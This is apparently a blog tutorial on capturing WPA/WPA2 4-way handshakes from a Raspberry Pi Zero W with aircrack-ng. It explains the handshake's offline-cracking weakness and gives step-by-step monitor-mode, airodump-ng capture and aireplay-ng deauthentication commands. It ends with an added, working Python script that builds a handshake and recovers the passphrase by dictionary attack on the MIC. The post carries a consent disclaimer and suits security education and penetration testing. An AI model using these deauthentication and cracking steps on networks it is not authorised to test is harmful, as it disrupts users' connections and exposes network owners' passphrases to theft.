In our previous blog, we showed how to set up a Raspberry Pi Zero W and connect to it remotely from a mobile device: https://hackernoon.com/setting-up-pi-zero-for-pi-fi-hacking?embedable=true

Disclaimer: Everything shown in this blog was done within legal boundaries and with the full consent of the network owner. The content is intended purely for educational purposes. The author does not endorse, and takes no responsibility for, any unauthorized use of the techniques demonstrated.

Now that we have the power of Linux at our fingertips, let's look at capturing WPA handshakes. But before we dive in, a quick recap.

WPA Handshake (4-Way Handshake)

WPA/WPA2 is the most widely used Wi-Fi security scheme. The core mechanism that establishes confidentiality and integrity for wireless traffic in WPA/WPA2 is the 4-way handshake, in which the client and the access point authenticate each other and establish the encryption keys used to protect data. As the name suggests, the 4-way handshake is an exchange of four messages between the client (supplicant) and the access point (authenticator). It starts once the client has authenticated and associated with the access point, and its messages are carried in EAPOL (Extensible Authentication Protocol over LAN) frames. Four keys are involved:

PMK (Pairwise Master Key): a shared secret established during authentication. In WPA2-Personal, the PMK is derived directly from the Pre-Shared Key (PSK) using the Password-Based Key Derivation Function 2 (PBKDF2). In WPA2-Enterprise, the PMK is derived from the Master Session Key (MSK) established during EAP authentication.

PTK (Pairwise Transient Key): a session key unique to one client/access-point pair, used to protect the unicast traffic between them. It is derived with a Pseudo-Random Function (PRF) from the following inputs:

PTK = PRF(PMK + ANonce + SNonce + MAC(Access Point) + MAC(Client))

GMK (Group Master Key): generated locally on the access point and never transmitted.

GTK (Group Temporal Key): derived from the GMK and distributed to every client associated with the same access point. It is used to protect the multicast and broadcast traffic the access point sends to its clients.

How the 4-Way Handshake Works

First EAPOL message (AP → Client): the access point sends the ANonce (Authenticator Nonce) to the client. The client now holds the PMK, the ANonce, both MAC addresses and its own SNonce (Supplicant Nonce), so it can derive the PTK (Pairwise Transient Key).

Second EAPOL message (Client → AP): the client sends its SNonce to the access point together with a MIC (Message Integrity Code) computed with the PTK. The access point uses the SNonce to derive the same PTK and verifies the MIC, which proves the client knows the PMK.

Third EAPOL message (AP → Client): the access point sends the GTK (Group Temporal Key) to the client, encrypted with the PTK, together with a MIC.

Fourth EAPOL message (Client → AP): the client sends a final EAPOL frame with a MIC acknowledging the successful installation of both the PTK (Pairwise Transient Key) and the GTK (Group Temporal Key).

That is the 4-way handshake in a nutshell. Each message gives the other side the information it needs to prove it knows the secret (PMK) and to build the session keys, and the access point and the client confirm that their keys match before using them. Once the handshake completes, encrypted communication can begin, as if there were a private tunnel between the two parties. There is a catch, though: anyone nearby can read the handshake itself.

Wireless traffic is inherently exposed; anyone in range can eavesdrop on it. During the 4-way handshake the important values (the nonces and the MAC addresses) are sent unencrypted, so an eavesdropper can record them. The pre-shared key (the passphrase) itself is never sent over the air; instead it is turned into the PMK (Pairwise Master Key) with PBKDF2. But because the handshake exposes every input except the passphrase, an attacker who captured it can:

1. Run a dictionary or brute-force attack, trying many candidate passphrases
2. Derive the PMK from each candidate with PBKDF2
3. Derive the PTK with the PRF
4. Compute the MIC and compare it with the captured MIC

If the computed MIC matches the captured MIC, the attacker has found the passphrase.

With the 4-way handshake and its weakness covered, we can start.

Capturing the WPA Handshake

We will use aircrack-ng, a complete suite of tools for assessing the security of Wi-Fi networks, to capture WPA handshakes.

Requirements

- A wireless adapter that supports monitor mode, connected to the Pi's data micro-USB port (not the power port) with an OTG cable
- An SSH connection to the Pi

Check the network interfaces:

ifconfig

You can use ip a if ifconfig is not available. You should see more than one wireless interface, for example wlan0 and wlan1: one is usually the Pi's internal wireless chip and the other is your external adapter. If you see only one, check that the adapter is plugged in properly and detected:

lsusb

This confirms that the adapter is recognised by the system.

Update the package lists:

sudo apt update

Install aircrack-ng:

sudo apt install aircrack-ng

Kali and Parrot usually ship with aircrack-ng pre-installed, but there is no harm in running this.

Enabling Monitor Mode

List the interfaces with airmon-ng:

sudo airmon-ng

The command shows each interface with its driver and chipset.

Enable monitor mode with airmon-ng:

sudo airmon-ng start <interface>

You may see a message suggesting that you run:

sudo airmon-ng check kill

That command kills processes that can interfere with monitor mode, such as NetworkManager or wpa_supplicant. Since we are connected over SSH, killing them could drop our session, so it is better to leave them running. Note that airmon-ng normally renames the interface when it enters monitor mode (wlan1 becomes wlan1mon, for example); use that name in the commands that follow.

Capturing the Handshake

Dump all traffic:

sudo airodump-ng <interface>

The command shows a real-time list of the visible access points and, below it, a list of the visible clients (stations). Leave it running for a while before moving on so that it collects enough packets. The upper section shows the access-point data:

BSSID: MAC address of the access point.
PWR: Signal level reported by the Wi-Fi adapter. The closer you are to the AP or station, the stronger the signal.
RXQ: Receive quality, measured as the percentage of packets successfully received over the last 10 seconds.
Beacons: Number of announcement packets sent by the access point.
#Data: Number of captured data packets.
#/s: Number of data packets per second, measured over the last 10 seconds.
CH: Channel number.
MB: Maximum speed supported by the access point.
ENC: Encryption algorithm in use; OPN means no encryption.
CIPHER: The cipher detected.
AUTH: The authentication protocol used.
ESSID: Name of the network (SSID).

The lower section shows the client (station) data:

STATION: MAC address of each associated station, or of stations searching for an AP to connect to. Clients not currently associated with an AP show a BSSID of "(not associated)".
RATE: The station's receive rate, followed by its transmit rate.
LOST: Number of data packets lost over the last 10 seconds.
Packets: Number of data packets sent by the client.
Notes: Additional information about the client, such as a captured EAPOL or PMKID.
Probes: ESSIDs probed by the client. These include networks it has connected to before and is trying to reach.

Next, copy the BSSID and channel (CH) of your target access point, as you will need them in the next step.

Dump traffic from the target access point. For this, open a new terminal so that the previous airodump-ng session keeps running (in the mobile terminal app, tap the three dots on the tab and choose Duplicate). Then run airodump-ng against the target:

sudo airodump-ng --bssid <bssid> -c <channel_number> -w <output> <interface>

--bssid: MAC address of the target access point
-c: channel of the target access point
-w: prefix of the file the capture is written to (airodump-ng appends a counter, so you get <output>-01.cap)

The command shows the target access point and the clients (stations) associated with it. In our case, one client is connected to the target.

Forcing the 4-way handshake (optional)

By default, capturing a WPA handshake is passive: we listen to the Wi-Fi traffic without transmitting anything, which is stealthy but means waiting for a client to (re)connect and trigger a 4-way handshake. To speed things up, we can force a connected client to disconnect; it will reconnect automatically and perform a new 4-way handshake. This is a deauthentication attack.

To do this, use aireplay-ng to send deauth packets to the target. Open yet another terminal (keeping the two airodump-ng sessions running):

sudo aireplay-ng --deauth 10 -a <target_bssid> <interface>

--deauth: run a deauthentication attack; -0 is an equivalent alias
10: number of deauth packets to send
-a: MAC address of the target access point

By default, aireplay-ng sends deauthentication frames with reason code 7 (Class 3 frame received from non-associated station). You can target a single client with the -c flag, which increases the chance of triggering a handshake when several clients are connected:

sudo aireplay-ng -0 10 -a <target_ap_mac> -c <client_mac> <interface>

Verifying the WPA Handshake

In the second terminal (airodump-ng running against the target access point), "EAPOL" in the Notes column of the client indicates that the client exchanged 4-way handshake frames. At the top right of the same window, "WPA handshake:" followed by the BSSID appears, confirming that the WPA handshake was captured successfully.

In a new terminal, verify that the captured pcap contains the WPA handshake using aircrack-ng:

sudo aircrack-ng <captured_file.cap>

If the capture contains a WPA handshake, aircrack-ng lists the network with its handshake count and offers to start cracking the WPA key. If it does not, it reports "No valid WPA handshakes found."

In the next blog, we will cover cracking the WPA handshake using Hashcat.
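The handshake exchange, the MIC check that aircrack-ng performs on a capture, and the offline attack described above, as one added example that is not part of the original post and not code from aircrack-ng. It runs both sides of a constructed WPA2-PSK handshake (CCMP, EAPOL-Key descriptor version 2) with made-up MAC addresses, nonces, SSID and passphrase, classifies the four EAPOL-Key frames by their Key Information bits the way a capture checker does, and then recovers the passphrase from messages 1 and 2 alone with a tiny wordlist. The 802.11 header, the encrypted GTK key data and the RSN information elements are left out; real frames carry them, but the MIC is computed over the EAPOL-Key frame in exactly this way.

```python
"""Constructed WPA2-PSK 4-way handshake, handshake check and offline MIC attack.

Added example, not code from the original post or from aircrack-ng.
The SSID, passphrase, MAC addresses and nonces are constructed for the demo.
"""
import hashlib
import hmac

MIC_OFF = 81  # 4-byte EAPOL header + 77 bytes of EAPOL-Key fields before the 16-byte MIC


def pmk_from_psk(passphrase: str, ssid: str) -> bytes:
    """WPA2-Personal: PMK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 rounds, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """IEEE 802.11 PRF-n: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ... concatenated."""
    out = b""
    for i in range((nbytes + 19) // 20):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:nbytes]


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK (384 bits for CCMP) from the PMK, both MAC addresses and both nonces; the KCK is its first 16 bytes."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 48)


def eapol_key(key_info: int, replay: int, nonce: bytes) -> bytes:
    """Minimal RSN EAPOL-Key frame (descriptor type 2, key length 16, zeroed MIC, empty key data)."""
    body = (b"\x02" + key_info.to_bytes(2, "big") + b"\x00\x10" + replay.to_bytes(8, "big")
            + nonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8 + b"\x00" * 16 + b"\x00\x00")
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body


def compute_mic(kck: bytes, frame: bytes) -> bytes:
    """MIC over the frame with its MIC field zeroed: HMAC-MD5 (descriptor version 1, TKIP) or HMAC-SHA1-128 (version 2, CCMP)."""
    zeroed = frame[:MIC_OFF] + b"\x00" * 16 + frame[MIC_OFF + 16:]
    if frame[6] & 0x07 == 1:
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def sign(kck: bytes, frame: bytes) -> bytes:
    """Write the MIC into the frame, as the sender does for messages 2, 3 and 4."""
    return frame[:MIC_OFF] + compute_mic(kck, frame) + frame[MIC_OFF + 16:]


def verify_mic(kck: bytes, frame: bytes) -> bool:
    """What the receiver does: recompute the MIC and compare it in constant time."""
    return hmac.compare_digest(compute_mic(kck, frame), frame[MIC_OFF:MIC_OFF + 16])


def classify(frame: bytes) -> int:
    """Handshake message number (1-4) from the Key Information bits Ack, MIC and Secure."""
    info = int.from_bytes(frame[5:7], "big")
    ack, mic, secure = info & 0x80, info & 0x100, info & 0x200
    if ack and not mic:
        return 1
    if ack and mic:
        return 3
    return 2 if not secure else 4


def has_handshake(frames) -> bool:
    """Capture check: a message 2 whose replay counter matches a message 1 (or a message 3 minus one)."""
    counters = {n: {int.from_bytes(f[9:17], "big") for f in frames if classify(f) == n} for n in (1, 2, 3)}
    return any(rc in counters[1] or rc + 1 in counters[3] for rc in counters[2])


def crack(ssid: str, ap_mac: bytes, sta_mac: bytes, msg1: bytes, msg2: bytes, wordlist):
    """Offline dictionary attack: PBKDF2 -> PRF -> MIC for each candidate, compared with the captured MIC."""
    anonce, snonce = msg1[17:49], msg2[17:49]  # both nonces travel in the clear
    for candidate in wordlist:
        kck = derive_ptk(pmk_from_psk(candidate, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
        if verify_mic(kck, msg2):
            return candidate
    return None


def demo_handshake(passphrase="correct horse", ssid="ExampleNet"):
    """Run both sides of a constructed handshake; returns what an eavesdropper can see plus the four frames."""
    ap_mac, sta_mac = bytes.fromhex("020000000001"), bytes.fromhex("020000000002")  # constructed
    anonce, snonce = hashlib.sha256(b"anonce").digest(), hashlib.sha256(b"snonce").digest()  # real ones are random
    pmk = pmk_from_psk(passphrase, ssid)                          # held by both sides, never sent over the air
    kck = derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce)[:16]  # same value on the AP and on the client
    m1 = eapol_key(0x008A, 1, anonce)                             # AP -> client: ANonce, no MIC yet
    m2 = sign(kck, eapol_key(0x010A, 1, snonce))                  # client -> AP: SNonce + MIC
    assert verify_mic(kck, m2)                                    # the AP checks the client's MIC
    m3 = sign(kck, eapol_key(0x13CA, 2, anonce))                  # AP -> client: GTK (omitted here) + MIC
    m4 = sign(kck, eapol_key(0x030A, 2, b"\x00" * 32))            # client -> AP: acknowledgement + MIC
    return ssid, ap_mac, sta_mac, [m1, m2, m3, m4]


if __name__ == "__main__":
    ssid, ap, sta, frames = demo_handshake()
    print("handshake in capture:", has_handshake(frames))
    print("recovered passphrase:", crack(ssid, ap, sta, frames[0], frames[1], ["password", "letmein", "correct horse"]))
```

Two things worth noticing when you run it. First, only messages 1 and 2 are needed: with the nonces, both MAC addresses and one MIC, every candidate passphrase can be checked offline, which is exactly why a partial capture of M1+M2 already counts as a valid handshake. Second, each candidate costs 4096 PBKDF2 rounds (8192 HMAC-SHA1 calls) before the cheap PRF and MIC steps, so the loop above manages only a few thousand guesses per second in Python; that cost is the reason the cracking step belongs on a GPU with Hashcat rather than on the Pi.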